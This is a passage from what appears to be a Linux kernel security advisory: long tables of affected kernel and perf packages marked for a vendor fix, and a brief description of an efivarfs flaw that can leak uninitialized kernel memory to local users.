|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
A flaw was found in the efivarfs component of the Linux kernel. This vulnerability, an information disclosure issue, arises from incorrect error handling in the efivar_entry_get function. An unprivileged local attacker can exploit this by reading from efivarfs, potentially causing uninitialized kernel memory to be copied to userspace. This could allow the attacker to obtain sensitive kernel memory contents, which may aid in bypassing security mitigations.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 | — |
